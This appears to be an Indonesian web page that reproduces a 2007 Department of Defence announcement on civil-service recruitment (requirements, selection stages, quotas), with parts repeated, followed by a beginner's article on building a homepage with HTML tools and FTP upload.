Cilangkap Jakarta Timur kode pos : 13870
b.Formulir Lamaran diambil di masing-masing tempat Pendaftaran
c.Tempat pendaftaran :
1)Departemen Pertahanan, Jln. Tanah Abang Timur No 8 Jakarta Pusat.
2)Mabes TNI di GOR Ahmad Yani Cilangkap Jakarta Timur dan Panitia Daerah.
3)Mabesad di AJENDAM I s.d. IX, XVI, XVII, IM dan Jaya.
4)Mabesal di Mabesal Cilangkap Jakarta Timur dan Panitia Daerah.
5)Mabesau di Mabesau Cilangkap Jakarta Timur dan Panitia Daerah.
d. Nama pelamar harus ditulis lengkap beserta dengan gelar akademik (khusus D-III, Sarjana (S-1), dan Dokter serta Apoteker)
e. Alamat pelamar harus ditulis lengkap dan jelas dengan mencantumkan KODE POS dan Nomor Telpon atau Hand Phone yang mudah dihubungi dari pelamar.
f.Berkas lamaran dimasukan ke dalam map folio pengadaan dengan warna :
1)Merah untuk lamaran : D-III
2)Kuning untuk lamaran : S-1
3)Hijau untuk lamaran : Dokter/Psikiater/Apoteker
g. Pendaftaran dimulai tanggal 6 s/d 7 September 2007 di masing-masing tempat pendaftaran pada jam kerja
4. Berkas lamaran dengan lampiran-lampirannya supaya disusun sesuai dengan urutan persyaratan sebagai berikut :
a. Formulir lamaran dengan pas foto 3×4 dan 4×6, berwarna dengan latar belakang merah, masing-masing 5 lbr.
b.Foto copy KTP sebanyak 3 lembar.
c.Surat Lamaran tulis tangan bermeterai Rp. 6.000,-
d.Daftar Riwayat Hidup singkat.
e.Foto copy Ijazah dan Transkrip nilai yang dilegalisir
- Fotocopy Ijazah (D-III,S1 dan/atau S2) berikut transkrip nilai yang sudah dilegalisir (cap dan tanda tangan asli) oleh Dekan/Direktur Program atau Ditjen Dikti Depdiknas bagi lulusan Perguruan Tinggi Luar Negeri (Surat Keterangan Kelulusan/Ijazah Sementara tidak dapat diterima)
f.Foto copy Akte Kelahiran/Kenal Lahir.
g.Foto copy Kartu Tanda Pencari Kerja (dari Depnaker).
h.Surat Keterangan Catatan Kepolisian (SKCK).
i.Surat Keterangan Bebas Narkoba (terbaru).
j.Surat Kesehatan (terbaru).
5.Tahapan Seleksi
Seleksi penerimaan Calon Pegawai Negeri Sipil Dephan dilakukan dengan tahapan-tahapan sebagai berikut :
a.Seleksi Administratif meliputi kelengkapan berkas persyaratan umum maupun khusus.
b. Seleksi Kesehatan (Test darah dan urine, Jantung, Gigi, Mata, THT, Radiologi dan Penyakit Dalam).
c.Seleksi Kesamaptaan jasmani (semapta A lari 12 menit).
d.Wawancara :
1)Test Mental Idiologi.
2)Test Kompetensi.
e.Test tertulis sesuai tingkatannya, meliputi :
1)Test Pengetahuan Umum (TPU) :
a) Ideologi : Pancasila dan UUD 45.
b) Politik : Sistem Administrasi Negara RI (Sanri), Sistem Pemerintahan Pusat dan Daerah, Politik Luar Negeri.
c) Ekonomi : Sistem ekonomi Indonesia, Kebijakan Fiskal dan moneter, Perdagangan Bebas.
d) Sosial budaya : Sejarah kebangsaaan dan masyarakat madani.
e) Pertahanan dan Keamanan : Wawasan Nusantara, Sistem Pertahanan dan keamanan.
f) Hukum : Norma hukum, azas hukum, supremasi hukum.
2). Test Bakat Skolastik (TBS), mengukur potensi seseorang dengan belajar berdasarkan penalaran verbal, penalaran kuantitatif dan penalaran analisis.
3).Test Bahasa Inggris.
6.Pengumuman Hasil Seleksi.
a. Pengumuman lulus/tidak lulus seleksi administratif, kesehatan, kesemaptaan, dan wawancara dilaksanakan oleh panitia unit masing-masing.
b. Seleksi test tertulis dilaksanakan bagi peserta yang telah lulus seleksi sebelumnya (sistem gugur).
c. Peserta yang dinyatakan lulus test tertulis selanjutnya akan ditetapkan oleh Panitia Penentu Akhir sesuai alokasi formasi dan kualifikasi pendidikan yang dibutuhkan.
d. Keputusan Panitia tidak dapat diganggu gugat.
II.PERSYARATAN KHUSUS
1.Departemen Pertahanan membutuhkan CPNS sebagai berikut :
a.Berijazah Sarjana S-1
1)Psikologi (Profesi) = 1 orang
2)Bahasa/Umum = 2 orang
3) Lulusan Perguruan Tinggi Negeri, Swasta yang terakreditasi A oleh Badan Akreditasi Nasional Perguruan Tinggi, atau lulusan luar negeri, dengan persyaratan IPK Ilmu Sosial minimal 3.25 (tiga koma dua lima) dan IPK Ilmu Exacta minimal 2.75 (dua koma tujuh lima).
4)Menguasai bahasa Inggris dengan nilai setara TOEFL 350.
b.Berijazah Diploma 3 (D III)
1)Keperawatan = 2 orang
2) Lulusan Perguruan Tinggi Negeri, Swasta yang terakreditasi Badan Akreditasi Nasional Perguruan Tinggi, atau lulusan luar negeri, dengan persyaratan IPK : minimal 2.75 (dua koma tujuh lima).
3)Menguasai bahasa Inggris dengan nilai setara TOEFL 350
2.Mabes TNI
a.Berijazah Sarjana S-1
1)Hukum = 5 orang
2)Ekonomi = 1 orang
3.Mabesad
a.Berijazah Ilmu Kedokteran/Apoteker/Psikologi
1)Kedokteran Umum (Profesi) = 67 orang
2)Dokter Gigi (Profesi) = 16 orang
3)Apoteker (Profesi) = 2 orang
4)Psikologi (Profesi) = 5 orang
b.Berijazah Sarjana S-1
1)Manajemen = 2 orang
2)Ilmu Sosial/Komunikasi = 9 orang
3)Komputer/Informatika = 4 orang
4)Kesehatan Masyarakat = 4 orang
5)Keperawatan = 8 orang
6)Ekonomi Akuntansi = 5 orang
c.Berijazah Diploma 3 (D-III)/Akademi
1)Keperawatan = 167 orang
2)Kebidanan = 17 orang
3)Analis Kesehatan = 16 orang
4)Teknik Rontgen = 8 orang
5)Gizi = 24 orang
6)Okupasi Terapi = 4 orang
7)Fisioterapi = 8 orang
8)Rekam Medik = 7 orang
9)Rehab Medik = 12 orang
10)Akademi Teknik Medik = 2 orang
11)Kesehatan Lingkungan = 8 orang
12)Teknik Gigi = 8 orang
13)Komputer/Informatika = 10 orang
14)Farmasi = 15 orang
15)Kesehatan Gigi/Keperawatan Gigi = 10 orang
16)Umum/Semua Jurusan = 34 orang
4.Mabesal
a.Berijazah Ilmu Kedokteran/Apoteker/Psikologi
1)Kedokteran Umum (Profesi)= 2 orang
2)Dokter Gigi (Profesi)= 2 orang
3)Apoteker (Profesi) = 1 orang
4)Psikologi Klinis (Profesi) = 3 orang
b.Berijazah Sarjana Informatika = 1 orang
c.Berijazah Diploma 3 (D-3)/Akademi
1)Keperawatan = 63 orang
2)Kebidanan = 11 orang
3)Analis Kesehatan = 17 orang
4)Teknik Rontgen = 12 orang
5)Gizi = 9 orang
6)Fisioterapi = 12 orang
7)Kesehatan Lingkungan = 8 orang
8)Teknik Gigi = 7 orang
9)Komputer/Informatika = 3 orang
10)Farmasi= 6 orang
11)Refraksi= 6 orang
12)Anestesi= 4 orang
13)Kesehatan Gigi/Keperawatan Gigi = 4 orang
14)Informatika= 4 orang
5.Mabesau
a)Berijazah Ilmu Kedokteran/Apoteker/Psikologi
1)Kedokteran Umum (Profesi)= 36 orang
2)Dokter Gigi (Profesi) = 15 orang
3)Psikologi Klinis (Profesi) = 2 orang
4)Psikologi (Profesi) = 3 orang
5)Apoteker= 4 orang
b.Berijazah Sarjana S-1
1)Bahasa Inggris = 2 orang
2)Theologi (Katholik & Protestan)= 4 orang
3)Ekonomi/Akuntansi= 4 orang
c.Berijazah Diploma 3 (D-3)/Akademi
1)Keperawatan = 160 orang
2)Kebidanan = 39 orang
3)Kesehatan Gigi/Keperawatan Gigi = 35 orang
4)Teknik Gigi = 8 orang
5)Analis Kesehatan = 40 orang
6)Gizi = 4 orang
7)Rontgen/Teknik Rontgen/Penta= 6 orang
8)Fisioterapi = 4 orang
9)Rekam Medik = 2 orang
10)Akademi Kesehatan= 4 orang
11)Komputer/Informatika= 4 orang
III.PENUGASAN
Bagi pelamar yang memenuhi persyaratan seleksi yang telah ditentukan, bersedia ditempatkan diseluruh wilayah negara Republik Indonesia.
IV.LAIN-LAIN
1. Seleksi masuk pegawai Negeri Sipil Dephan tidak dipungut biaya dan bebas KKN.
2. Dephan tidak bertanggung jawab atas pungutan atau tawaran berupa apapun oleh oknum-oknum yang mengatasnamakan Dephan atau Panitia, sehingga peserta diharapkan tidak melayani tawaran-tawaran untuk mempermudah penerimaan sebagai CPNS Dephan.
3. Informasi resmi yang terkait dengan seleksi CPNS Dephan 2007 hanya dapat dilihat dalam website Dephan http://www.dephan.go.id atau http://dmcindonesia.web.id dan media cetak harian Media Indonesia dan Suara Pembaharuan
Jakarta, September 2007
a.n. MENTERI PERTAHANAN
SEKRETARIS JENDERAL
ttd
SJAFRIE SJAMSOEDDIN
LETNAN JENDERAL TNI
DEPARTEMEN PERTAHANAN REPUBLIK INDONESIA
PENGUMUMAN Nomor : PENG/25/VIII/2007TENTANG
PENERIMAAN CALON PEGAWAI NEGERI SIPIL DEPARTEMEN PERTAHANAN
TINGKAT SARJANA (GOLONGAN III/b dan III/a), DIPLOMA 3 (GOLONGAN II/c) TAHUN ANGGARAN 2007
Departemen Pertahanan Republik Indonesia membuka kesempatan kepada Warga Negara Indonesia pria dan wanita :
1.Unit Organisasi Departemen Pertahanan memerlukan Calon Pegawai Negeri Sipil (CPNS) :
a.Untuk golongan III/b sebanyak 1 orang
b.Untuk golongan III/a sebanyak 2 orang
c.Untuk golongan II/c sebanyak 2 orang
2.Unit Organisasi Mabes TNI memerlukan Calon Pegawai Negeri Sipil (CPNS) :
Untuk golongan III/a sebanyak 6 orang
3.Unit Organisasi TNI AD memerlukan Calon Pegawai Negeri Sipil (CPNS) :
a.Untuk golongan III/b sebanyak 90 orang
b.Untuk golongan III/a sebanyak 32 orang
c.Untuk golongan II/c sebanyak 350 orang
4.Unit Organisasi TNI AL memerlukan Calon Pegawai Negeri Sipil (CPNS):
a.Untuk golongan III/b sebanyak 8 orang
b.Untuk golongan III/a sebanyak 1 orang
c.Untuk golongan II/c sebanyak 166 orang
5.Unit Organisasi TNI AU memerlukan Calon Pegawai Negeri Sipil (CPNS) :
a.Untuk golongan III/b sebanyak 60 orang
b.Untuk golongan III/a sebanyak 10 orang
c.Untuk golongan II/c sebanyak 306 orang
I.PERSYARATAN KHUSUS
1.Status Pelamar
a.Warga Negara Indonesia baik pria maupun wanita
b.Berkelakuan baik yang dibuktikan dengan Surat Keterangan Catatan Kepolisian.
c. Tidak pernah diberhentikan dengan hormat tidak atas permintaan sendiri atau tidak dengan hormat sebagai PNS/Anggota TNI/Polri maupun sebagai pegawai swasta dengan Surat Pernyataan.
d. Tidak berkedudukan sebagai CPNS dan tidak sedang terikat perjanjian/kontrak kerja dengan instansi lain dengan Surat Pernyataan.
e. Tidak bersuami/beristrikan seorang yang berkewarganegaraan asing atau tanpa kewarganegaraan dengan mencantumkan surat keterangan dari Kelurahan/kepala desa.
f.Usia maksimum pada tanggal 1 Oktober 2007
1)Dokter Spesialis 40 tahun.
2)Dokter Umum 35 tahun.
3)S1 dan D3 berusia 30 tahun.
2.Keadaan Jasmani dan Rohani Pelamar
a.Tinggi badan, minimal untuk Pria 160 Cm, Wanita 155 Cm
b.Berat badan mendekati ideal (tidak overweight dan tidak underweight)
c.Tidak tuna rungu dan tuna wicara
d.Memiliki dua mata (tidak juling, tidak buta warna, tidak palsu)
e.Tidak bertato dan bertindik (kecuali karena adat)
f.Berpenampilan baik
3.Tata cara pengajuan lamaran
a.Surat lamaran ditujukan untuk :
1)DEPARTEMEN PERTAHANAN
Kepada
Yth. SEKJEN DEPHAN
U.p. KARO KEPEGAWAIAN
Jalan Merdeka Barat No. 13-14
di
Jakarta Pusat kode pos : 10110
2)MABES TNI
Kepada
Yth. KASUM TNI
U.p. Aspers
Mabes TNI
Cilangkap Jakarta Timur kode pos : 13870
3)ANGKATAN DARAT
Kepada
Yth. Kepala Staf Angkatan Darat
U.p. Ka Ajendam
di
Tempat (sesuai alamat)
4)ANGKATAN LAUT
Kepada
Yth. Kepala Staf Angkatan Laut
u.p. KADISMINPERSAL
MABES AL
Cilangkap Jakarta Timur kode pos : 13870
5)ANGKATAN UDARA
Kepada
Yth. Kepala Staf Angkatan Udara
u.p. KADISMINPERSAU
MABES AU
Cilangkap Jakarta Timur kode pos : 13870
b.Formulir Lamaran diambil di masing-masing tempat Pendaftaran
c.Tempat pendaftaran :
1)Departemen Pertahanan, Jln. Tanah Abang Timur No 8 Jakarta Pusat.
2)Mabes TNI di GOR Ahmad Yani Cilangkap Jakarta Timur dan Panitia Daerah.
3)Mabesad di AJENDAM I s.d. IX, XVI, XVII, IM dan Jaya.
4)Mabesal di Mabesal Cilangkap Jakarta Timur dan Panitia Daerah.
5)Mabesau di Mabesau Cilangkap Jakarta Timur dan Panitia Daerah.
d. Nama pelamar harus ditulis lengkap beserta dengan gelar akademik (khusus D-III, Sarjana (S-1), dan Dokter serta Apoteker)
e. Alamat pelamar harus ditulis lengkap dan jelas dengan mencantumkan KODE POS dan Nomor Telpon atau Hand Phone yang mudah dihubungi dari pelamar.
f.Berkas lamaran dimasukan ke dalam map folio pengadaan dengan warna :
1)Merah untuk lamaran : D-III
2)Kuning untuk lamaran : S-1
3)Hijau untuk lamaran : Dokter/Psikiater/Apoteker
g. Pendaftaran dimulai tanggal 6 s/d 7 September 2007 di masing-masing tempat pendaftaran pada jam kerja
4. Berkas lamaran dengan lampiran-lampirannya supaya disusun sesuai dengan urutan persyaratan sebagai berikut :
a. Formulir lamaran dengan pas foto 3×4 dan 4×6, berwarna dengan latar belakang merah, masing-masing 5 lbr.
b.Foto copy KTP sebanyak 3 lembar.
c.Surat Lamaran tulis tangan bermeterai Rp. 6.000,-
d.Daftar Riwayat Hidup singkat.
e.Foto copy Ijazah dan Transkrip nilai yang dilegalisir
- Fotocopy Ijazah (D-III,S1 dan/atau S2) berikut transkrip nilai yang sudah dilegalisir (cap dan tanda tangan asli) oleh Dekan/Direktur Program atau Ditjen Dikti Depdiknas bagi lulusan Perguruan Tinggi Luar Negeri (Surat Keterangan Kelulusan/Ijazah Sementara tidak dapat diterima)
f.Foto copy Akte Kelahiran/Kenal Lahir.
g.Foto copy Kartu Tanda Pencari Kerja (dari Depnaker).
h.Surat Keterangan Catatan Kepolisian (SKCK).
i.Surat Keterangan Bebas Narkoba (terbaru).
j.Surat Kesehatan (terbaru).
5.Tahapan Seleksi
Seleksi penerimaan Calon Pegawai Negeri Sipil Dephan dilakukan dengan tahapan-tahapan sebagai berikut :
a.Seleksi Administratif meliputi kelengkapan berkas persyaratan umum maupun khusus.
b. Seleksi Kesehatan (Test darah dan urine, Jantung, Gigi, Mata, THT, Radiologi dan Penyakit Dalam).
c.Seleksi Kesamaptaan jasmani (semapta A lari 12 menit).
d.Wawancara :
1)Test Mental Idiologi.
2)Test Kompetensi.
e.Test tertulis sesuai tingkatannya, meliputi :
1)Test Pengetahuan Umum (TPU) :
a) Ideologi : Pancasila dan UUD 45.
b) Politik : Sistem Administrasi Negara RI (Sanri), Sistem Pemerintahan Pusat dan Daerah, Politik Luar Negeri.
c) Ekonomi : Sistem ekonomi Indonesia, Kebijakan Fiskal dan moneter, Perdagangan Bebas.
d) Sosial budaya : Sejarah kebangsaaan dan masyarakat madani.
e) Pertahanan dan Keamanan : Wawasan Nusantara, Sistem Pertahanan dan keamanan.
f) Hukum : Norma hukum, azas hukum, supremasi hukum.
2). Test Bakat Skolastik (TBS), mengukur potensi seseorang dengan belajar berdasarkan penalaran verbal, penalaran kuantitatif dan penalaran analisis.
3).Test Bahasa Inggris.
6.Pengumuman Hasil Seleksi.
a. Pengumuman lulus/tidak lulus seleksi administratif, kesehatan, kesemaptaan, dan wawancara dilaksanakan oleh panitia unit masing-masing.
b. Seleksi test tertulis dilaksanakan bagi peserta yang telah lulus seleksi sebelumnya (sistem gugur).
c. Peserta yang dinyatakan lulus test tertulis selanjutnya akan ditetapkan oleh Panitia Penentu Akhir sesuai alokasi formasi dan kualifikasi pendidikan yang dibutuhkan.
d. Keputusan Panitia tidak dapat diganggu gugat.
II.PERSYARATAN KHUSUS
1.Departemen Pertahanan membutuhkan CPNS sebagai berikut :
a.Berijazah Sarjana S-1
1)Psikologi (Profesi) = 1 orang
2)Bahasa/Umum = 2 orang
3) Lulusan Perguruan Tinggi Negeri, Swasta yang terakreditasi A oleh Badan Akreditasi Nasional Perguruan Tinggi, atau lulusan luar negeri, dengan persyaratan IPK Ilmu Sosial minimal 3.25 (tiga koma dua lima) dan IPK Ilmu Exacta minimal 2.75 (dua koma tujuh lima).
4)Menguasai bahasa Inggris dengan nilai setara TOEFL 350.
b.Berijazah Diploma 3 (D III)
1)Keperawatan = 2 orang
2) Lulusan Perguruan Tinggi Negeri, Swasta yang terakreditasi Badan Akreditasi Nasional Perguruan Tinggi, atau lulusan luar negeri, dengan persyaratan IPK : minimal 2.75 (dua koma tujuh lima).
3)Menguasai bahasa Inggris dengan nilai setara TOEFL 350
2.Mabes TNI
a.Berijazah Sarjana S-1
1)Hukum = 5 orang
2)Ekonomi = 1 orang
3.Mabesad
a.Berijazah Ilmu Kedokteran/Apoteker/Psikologi
1)Kedokteran Umum (Profesi) = 67 orang
2)Dokter Gigi (Profesi) = 16 orang
3)Apoteker (Profesi) = 2 orang
4)Psikologi (Profesi) = 5 orang
b.Berijazah Sarjana S-1
1)Manajemen = 2 orang
2)Ilmu Sosial/Komunikasi = 9 orang
3)Komputer/Informatika = 4 orang
4)Kesehatan Masyarakat = 4 orang
5)Keperawatan = 8 orang
6)Ekonomi Akuntansi = 5 orang
c.Berijazah Diploma 3 (D-III)/Akademi
1)Keperawatan = 167 orang
2)Kebidanan = 17 orang
3)Analis Kesehatan = 16 orang
4)Teknik Rontgen = 8 orang
5)Gizi = 24 orang
6)Okupasi Terapi = 4 orang
7)Fisioterapi = 8 orang
8)Rekam Medik = 7 orang
9)Rehab Medik = 12 orang
10)Akademi Teknik Medik = 2 orang
11)Kesehatan Lingkungan = 8 orang
12)Teknik Gigi = 8 orang
13)Komputer/Informatika = 10 orang
14)Farmasi = 15 orang
15)Kesehatan Gigi/Keperawatan Gigi = 10 orang
16)Umum/Semua Jurusan = 34 orang
4.Mabesal
a.Berijazah Ilmu Kedokteran/Apoteker/Psikologi
1)Kedokteran Umum (Profesi)= 2 orang
2)Dokter Gigi (Profesi)= 2 orang
3)Apoteker (Profesi) = 1 orang
4)Psikologi Klinis (Profesi) = 3 orang
b.Berijazah Sarjana Informatika = 1 orang
c.Berijazah Diploma 3 (D-3)/Akademi
1)Keperawatan = 63 orang
2)Kebidanan = 11 orang
3)Analis Kesehatan = 17 orang
4)Teknik Rontgen = 12 orang
5)Gizi = 9 orang
6)Fisioterapi = 12 orang
7)Kesehatan Lingkungan = 8 orang
8)Teknik Gigi = 7 orang
9)Komputer/Informatika = 3 orang
10)Farmasi= 6 orang
11)Refraksi= 6 orang
12)Anestesi= 4 orang
13)Kesehatan Gigi/Keperawatan Gigi = 4 orang
14)Informatika= 4 orang
5.Mabesau
a)Berijazah Ilmu Kedokteran/Apoteker/Psikologi
1)Kedokteran Umum (Profesi)= 36 orang
2)Dokter Gigi (Profesi) = 15 orang
3)Psikologi Klinis (Profesi) = 2 orang
4)Psikologi (Profesi) = 3 orang
5)Apoteker= 4 orang
b.Berijazah Sarjana S-1
1)Bahasa Inggris = 2 orang
2)Theologi (Katholik & Protestan)= 4 orang
3)Ekonomi/Akuntansi= 4 orang
c.Berijazah Diploma 3 (D-3)/Akademi
1)Keperawatan = 160 orang
2)Kebidanan = 39 orang
3)Kesehatan Gigi/Keperawatan Gigi = 35 orang
4)Teknik Gigi = 8 orang
5)Analis Kesehatan = 40 orang
6)Gizi = 4 orang
7)Rontgen/Teknik Rontgen/Penta= 6 orang
8)Fisioterapi = 4 orang
9)Rekam Medik = 2 orang
10)Akademi Kesehatan= 4 orang
11)Komputer/Informatika= 4 orang
III.PENUGASAN
Bagi pelamar yang memenuhi persyaratan seleksi yang telah ditentukan, bersedia ditempatkan diseluruh wilayah negara Republik Indonesia.
IV.LAIN-LAIN
1. Seleksi masuk pegawai Negeri Sipil Dephan tidak dipungut biaya dan bebas KKN.
2. Dephan tidak bertanggung jawab atas pungutan atau tawaran berupa apapun oleh oknum-oknum yang mengatasnamakan Dephan atau Panitia, sehingga peserta diharapkan tidak melayani tawaran-tawaran untuk mempermudah penerimaan sebagai CPNS Dephan.
3. Informasi resmi yang terkait dengan seleksi CPNS Dephan 2007 hanya dapat dilihat dalam website Dephan http://www.dephan.go.id atau http://dmcindonesia.web.id dan media cetak harian Media Indonesia dan Suara Pembaharuan
Jakarta, September 2007
a.n. MENTERI PERTAHANAN
SEKRETARIS JENDERAL
ttd
SJAFRIE SJAMSOEDDIN
LETNAN JENDERAL TNI
04 September 2007
Menulis Homepage
Menulis Homepage
Oleh : JPN. Sumarno
Judul diatas sebenarnya amat relatif, karena dalam membuat sebuah homepage juga terdapat aktivitas
menggambar yang amat jauh dari arti menulis. Judul diatas dipilih oleh penulis karena pada dasarnya
dalam pembuatan homepage, anda dituntut menuliskan kode-kode HTML yang berfungsi untuk menampilkan
informasi anda baik berupa teks, gambar, video dan suara.
Pada saat ini situs internet sudah demikian marak informasinya, tak hanya terbatas pada soal-soal
software komputer. Mulai dari Ibu hamil yang mempunyai publikasi di internet, anak-anak sampai dengan
situs kaum profesional dari berbagai bidang sudah mengisi informasinya di internet. Mereka mengisi
informasi di internet tidak hanya didasarkan pada latarbelakang bisnis semata. Banyak para pemilik
yayasan atau organisasi non profit memiliki situs internet. Tujuannya adalah untuk menyuarakan
aspirasi mereka kepada publik internasional, baik hanya sekedar brosur organisasi ataupun ajakan
berbuat kebaikan seperti yang ditampilkan oleh beberapa situs perlindungan satwa langka..
Tampaknya soal menulis dokumen untuk sebuah situs internet sudah menjadi tuntutan setiap orang dan
sudah merupakan salah satu skill atau ketrampilan yang perlu dipelajari tiap orang saat ini.
Membuat sebuah dokumen untuk disimpan di halaman homepage situs internet sebenarnya bukanlah hal yang
sulit pada saat ini, karena Microsoft telah membuat aplikasi word processor ataupun spreadsheet yang
dapat membuat file dengan format HTML.
Bila anda sudah memiliki Office 2000 pada komputer anda, ketika anda bekerja pada MS Word ataupun
Excell, file dokumen anda dapat disimpan dengan format HTML secara mudah yaitu dengan melakukan
perintah (klik) File kemudian save as, pada windows yang tampak isilah nama file anda dan pilihlah
format dokumen anda sebagai web pages, atau HTML.
Agar dokumen itu dapat tampil dengan lebih baik dan lebih indah anda perlu merencanakan dulu susunan
dan tampilan dokumen anda diatas kertas. Kemudian bila diperlukan gambar-gambar yang menarik anda
perlu mempergunakan software gambar atau scaner.
Tulisan ini dimaksudkan untuk memberikan panduan ringkas kepada anda dengan alat bantu sederhana, agar
anda bisa membuat halaman homepages beberapa halaman secar cepat meskipun tidak mempergunakan software
web desain khusus.
Program (software) yang dipergunakan:
1. Netscape Composer atau Frontpage Express untuk membuat halaman kosong.
2. Notepad untuk edit text dan kode HTML secara cepat. WSFTP32 untuk mentrasferkan file homapage
dari komputer anda ke web server.
3. Photoshop 5.0 atau Paintbrush untuk membuat/mengedit gambar atau video yang akan ditambahkan
pada homepage anda.
4. Microsoft Word 97 dipergunakan apabila anda hendak menulis artikel dan langsung disimpan (save)
dalam file berformat HTML.
Syarat teknis
1. Telah memiliki domain.
2. Telah memiliki ruang (atau space) penyimpan file anda dalam web server yang disimpan di ISP.
Biasa disebut Web Hosting Service.
Web server adalah komputer yang berfungsi sebagai server web site, server ini disimpan di Internet
Service Provider agar terhubung ke internet selama 24 jam nonstop. Apabila Web server disimpan di
tempat maka anda perlu memiliki saluran komunikasi data kontinyu (terus menerus) 24 jam non stop ke
ISP terdekat.
3. PC Windows 95 atau Windows 98, processor minimal AT 486, RAM 16 mbyte, Hardisk 1 Gbyte. PC
Pentium dengan RAM > 32 Mbyte dan Hardisk > 1 Gbyte akan lebih baik lagi.
4. Sambungan internet
Format penulisan
Di bagian depan (cover) biasa diisi dengan daftar isi yang dihubungkan (atau dilink-kan) ke halaman
yang berisi uraian lengkapnya. Bagian depan ini biasa disebut home Setiap judul, selalu diikuti dengan
ulasan singkatnya. Ini yang membedakannya dari daftar isi sebuah buku. Logo juga biasa diletakkan di
sudut kiri atau kanan atas. Lay out penulisan, bisa diatur dengan mempergunakan tabel yang tidak
bergaris (atau border tabel diberi nilai nol).
Bagian tengah situs anda, dapat diisi dengan uraian lengkap berikut gambar-gambarnya.
Setiap halaman atau judul maupun sub-judul dihubungkan satu sama lain mempergunakan link.
Penulisan Informasi
Penulisan informasi anda dibuat seringkas mungkin, padat, jelas dan menarik. Bila anda hendak
mempublikasikan dokumen anda di intenet dalam bentuk aslinya (misalnya halaman buku yang discanning,
atau dokumen yang anda tulis mempergunakan MS Word 6.0) bisa juga disimpan dalam web server namun
sebaiknya diubah dulu format file dokumen anda tersebut dengan Adobe Acrobat, agar file dokumen anda
bentuknya tetap, namun ukuran file yang disimpan di dalam web server jauh lebih kecil. Ini akan
menguntungkan anda karena dengan begitu pengguna internet akan dengan mudah dan cepat mendapatkan file
dokumen tersebut dari web server anda ke komputernya.
Sebelum menulis buat rencana kerjanya terlebih dahulu. Yang perlu diperhatikan antara lain :
* Anda harus mengumpulkan bahan yang akan anda masukan ke dalam homepage anda.
* Pelajari bahan tersebut, buat rangkumannya pada kertas kerja anda, tambahkan perkiraan waktu
untuk mengerjakannya berapa jam.
* Bagilah rangkuman tersebut dalam beberapa kelompok (bisa dilihat dari sub-sub judulnya kalau
ada). Setiap halaman pada kertas kerja diberikan nomor urut. Semua sub-sub judul ini dapat dituliskan
di halaman depan.
* Buatlah direktori di PC Windows anda sesuai nama pekerjaannya, misalnya anda membuat homepage
SMU1, nama ini bisa dijadikan nama direktori tsb.
* Buatlah gambar, foto atau video dan suara agar bisa dimuat dalam homepage. Format gambar umumnya
berupa file.gif atau file.jpg. Sedangkan format video biasanya namafile.avi. Foto terlebih dahulu
discan menggunakan alat scanner, bila anda belum mempunyai alat ini, bisa meminta bantuan rental
komputer yang menyediakan jasa scanning. Bila jumlah gambar yang akan dimuat cukup banyak, ukuran
gambar perlu diperhatikan karena terlalu besar ukuran gambar dan terlalu banyak jumlah gambar di
homepage anda akan mempersulit pengguna internet nantinya ketika mengakses situs anda. Berilah nama
(atau nomor) dengan baik berikut catatan nomor halaman homepage yang akan anda lengkapi dengan gambar.
* Tuliskan tulisan anda pada tiap halaman dan aturlah layoutnya. Cara mengatur layout HTML lihat
Mengatur Layout Halaman Homepage.
* Membuat halaman HTML, secara cepat dapat anda lakukan langkah berikut : pertama bukalah browser
Netscape atau Frontpage Express. Buatlah satu halaman kosong dan simpanlah (save) didalam direktori
anda tadi, misalnya direktori anda tadi yaitu SMU1. Coba anda buka file ini dengan Internet Explorer
atau Nestcape Navigator, kemudian pilih perintah View dan klik source atau page source. Anda akan
melihat kode HTML pada halaman kosong anda tadi.
* Langkah kedua, bukalah Windows Explorer anda, buka direktori SMU1, cek apakah file kosong tadi
sudah tersimpan disitu. Bila sudah anda lihat, geserkan kursor mouse ke atas nama filenya dan klik.
Lakukan perintah copy agar file ini tercopy beberapa buah. Jumlah file yang dicopy tergantung
kebutuhan anda menulis, bila nanti ketika anda menulis ternyata kurang, kekurangan file kosong ini
dapat diatasi dengan cara mengcopy ulang atau membuat ulang halaman kosong yang dibutuhkan. Gantilah
nama file hasil pengcopyan tadi dengan nama yang berurutan misalnya anda beri nama hal01.html, file
berikutnya anda beri nama hal02.html, hal03.html dan seterusnya.
* Langkah ketiga adalah mengisi halaman kosong berformat HTML tadi dengan informasi anda. Cara
menuliskannya anda bisa mempergunakan Netscape Composer atau Frontpage Express. Tetapi anda juga dapat
mengisi dengan Notepad untuk penulisan teks atau editing halaman HTML secara cepat. Panduan menulis
informasi anda dengan penulisan kode HTML dapat anda baca pada makalah Pengenalan HTML
Cek Jumlah Pengakses Situs Anda
Untuk mengetahui berapa orang yang sudah mengakses situs anda, anda bisa menambahkan counter di
halaman depan homepage anda
Respon Pengakses
Agar anda bisa menerima masukan atau respon dari pengakses situs anda, anda juga perlu menambahkan
alamat anda secara lengkap pada homepage anda, berikut emailnya
Formulir Pendaftaran
Apabila diinginkan pengakses situs anda mendaftarkan dirinya, anda dapat menambahkan form pendaftaran
di halaman situs anda dihalaman manapun
Search Engine
Jika anda ingin memberikan kemudahan kepada pengakses situs anda supaya lebih cepat mencapai halaman
yang berisi uraian yang sesuai dengan kata kunci yang diketiknya, anda dapat menambahkan search engine
Published
File homepage anda yang sudah anda buat didalam direktori tadi, segera copykan ke disket. Kemudian
berikan disket tersebut kepada adminstrator jaringan di tempat anda. Apabila anda merangkap
administratornya, anda bisa langsung menempatkan file tersebut kedalam direktori www di dalam web
server anda. Cara penempatan ini bisa dibantu dengan mempergunakan perangkat WSFTP32, atau bila anda
langsung didepan servernya, anda bisa langsung memasukan file tersebut kedalam direktorinya. File
homepage ini bisa anda panggil pada browser dengan memanggil http://nama domain anda.
Selanjutnya anda perlu mendaftarkan situs anda pada search engine seperti Google; Netscape; Catcha;
Yahoo dan search engine lainnya. Umumnya search engine memberikan pendaftaran gratis dan non gratis,
anda dapat memilih yang gratis. Selamat mencoba.
Oleh : JPN. Sumarno
Judul diatas sebenarnya amat relatif, karena dalam membuat sebuah homepage juga terdapat aktivitas
menggambar yang amat jauh dari arti menulis. Judul diatas dipilih oleh penulis karena pada dasarnya
dalam pembuatan homepage, anda dituntut menuliskan kode-kode HTML yang berfungsi untuk menampilkan
informasi anda baik berupa teks, gambar, video dan suara.
Pada saat ini situs internet sudah demikian marak informasinya, tak hanya terbatas pada soal-soal
software komputer. Mulai dari Ibu hamil yang mempunyai publikasi di internet, anak-anak sampai dengan
situs kaum profesional dari berbagai bidang sudah mengisi informasinya di internet. Mereka mengisi
informasi di internet tidak hanya didasarkan pada latarbelakang bisnis semata. Banyak para pemilik
